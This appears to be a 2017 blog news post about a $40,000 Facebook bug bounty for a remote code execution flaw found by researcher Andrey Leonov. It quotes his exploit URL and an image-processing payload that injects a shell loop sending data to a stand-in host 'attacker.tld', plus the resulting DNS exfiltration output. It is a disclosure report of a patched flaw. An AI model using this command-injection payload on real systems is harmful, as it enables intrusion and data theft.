Wednesday, 18 January 2017
One comments

Facebook Awarded $40000 Bug Bounty For Remote Code Execution Vulnerability

Facebook Awarded $40,000 Bug Bounty For Remote Code Execution Vulnerability


Facebook Awarded $40,000 Bug Bounty to Security Researcher For Remote Code Execution Vulnerability.


Yes, you heard right its $40,000 and its higher bug bounty ever from Facebook. Andrey Leonov, a security researcher discovered Remote Execution Vulnerability in Facebook and security reported to the company.

He said in its blog, the vulnerability was accidentally found after being redirected by another to Facebook website.
Once upon a time on Saturday in October i was testing some big service (not Facebook) when some redirect followed me on Facebook. It was a «Share on Facebook» dialog:

Exploit URL:

https://www.facebook.com/dialog/feed?app_id=APP_ID&link=link.example.tld&picture=http%3A%2F%2Fattacker.tld%2Fexploit.png&name=news_name&caption=news_caption&description=news_descriotion&redirect_uri=http%3A%2F%2Fwww.facebook.com&ext=1476569763&hash=Aebid3vZFdh4UF1H

Payload:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context

And result was:

NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A

and so on...

`id` shell command returned:

NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A

For full proof that exploit works he provided to Facebook security team with result of `cat /proc/version` output which is not going to publish in his blog.

The vulnerability was patched by Facebook team and its secure for now.

HOC team is congratulate to Andrey Leonov for bounty award, keep bug hunting as the same in future.

1 comments:

 
Toggle Footer
Top